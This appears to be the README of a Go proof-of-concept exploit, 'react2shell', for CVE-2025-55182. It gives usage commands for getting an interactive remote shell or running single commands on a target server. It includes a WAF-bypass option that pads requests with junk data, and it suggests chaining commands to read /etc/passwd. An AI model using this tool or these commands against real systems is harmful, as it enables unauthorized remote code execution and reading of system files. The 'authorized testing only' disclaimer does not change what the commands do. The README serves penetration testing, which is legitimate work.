
react2shell PoC con Go / CVE-2025-55182
CVE-2025-55182 PoC
# Interactive shell
./react2shell -u http://target:3000
# Single command
./react2shell -u http://target:3000 -c "id"
# WAF bypass (128KB junk data)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| Flag | Descrizione |
|---|---|
-u | URL del target |
-c | Comando singolo (opzionale) |
-waf | Dimensione dei dati spazzatura per il bypass WAF in KB (opzionale) |
; o && per concatenare i comandi: cd /etc && cat passwdSolo per test di sicurezza autorizzati.
; o && per concatenare i comandi: cd /etc && cat passwdSolo per test di sicurezza autorizzati.